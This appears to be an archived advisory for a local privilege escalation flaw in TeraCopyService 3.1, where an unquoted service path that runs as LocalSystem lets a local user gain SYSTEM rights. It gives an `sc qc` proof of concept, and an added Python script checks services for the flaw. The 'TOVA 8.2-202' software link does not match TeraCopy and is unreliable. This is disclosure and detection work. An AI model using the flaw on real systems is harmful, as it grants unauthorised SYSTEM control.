TeraCopyService 3.1 Unquoted Service Path Privilege Escalation
Posted on 04 September 2017
# Exploit Title: TeraCopyService 3.1 - Unquoted Service Path Privilege Escalation
# Date of Discovery: August 31 2017
# Exploit Author: Rithwik Jayasimha
# Author Homepage/Contact: https://thel3l.me
# Vendor Name: Codesector
# Vendor Homepage: http://www.codesector.com/
# Software Link: TOVA 8.2-202 - http://www.codesector.com/teracopy
# Affected Versions: <3.1 confirmed, possibly later versions
# Tested on: Windows 7
# Category: local
# Vulnerability type: Local Privilege Escalation

# Description:
TeraCopy installs a service ("TeraCopyService") with an unquoted service path running with SYSTEM privileges.
This allows any non-privileged local user to execute arbitrary code with SYSTEM privileges.

# Proof Of Concept:

C:\Users\potato> sc qc TeraCopyService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: TeraCopyService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files\TeraCopy\TeraCopyService.exe
        LOAD_ORDER_GROUP   : System Reserved
        TAG                : 0
        DISPLAY_NAME       : TeraCopy Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
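
A defender-side check for the condition this advisory reports, as an added example (not part of the original advisory or the vendor's code): it parses `sc qc` output and flags a BINARY_PATH_NAME that is unquoted and contains a space. The sample output is constructed in the layout shown above, and the function names are hypothetical.

```python
import re

# Constructed sample: `sc qc` output in the layout the advisory shows.
SAMPLE_SC_QC = r"""[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: TeraCopyService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Program Files\TeraCopy\TeraCopyService.exe
        DISPLAY_NAME       : TeraCopy Service
        SERVICE_START_NAME : LocalSystem
"""

FIELD = re.compile(r"\s*([A-Z_]+)\s*:\s?(.*)$")
# Unquoted image path: shortest prefix ending in .exe before whitespace or end.
IMAGE = re.compile(r"(.+?\.exe)(?=\s|$)", re.IGNORECASE)


def parse_sc_qc(text):
    """Return the KEY : value fields of one `sc qc` result as a dict."""
    fields = {}
    for line in text.splitlines():
        m = FIELD.match(line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields


def split_image_path(binary_path):
    """Return (image_path, arguments, was_quoted) for a BINARY_PATH_NAME."""
    p = binary_path.strip()
    if p.startswith('"'):
        end = p.find('"', 1)
        end = len(p) if end == -1 else end
        return p[1:end], p[end + 1:].strip(), True
    m = IMAGE.match(p)
    image = m.group(1) if m else p
    return image, p[len(image):].strip(), False


def audit_service(fields):
    """Flag an unquoted image path containing a space; propose the quoted form."""
    image, args, quoted = split_image_path(fields.get("BINARY_PATH_NAME", ""))
    flagged = not quoted and " " in image
    fixed = ('"%s" %s' % (image, args)).strip() if flagged else None
    return {"service": fields.get("SERVICE_NAME"),
            "account": fields.get("SERVICE_START_NAME"),
            "flagged": flagged, "quoted_form": fixed}


if __name__ == "__main__":
    print(audit_service(parse_sc_qc(SAMPLE_SC_QC)))
```

The `quoted_form` value is the image path as it should be stored for the service; a flagged service running as LocalSystem is the case described in the advisory.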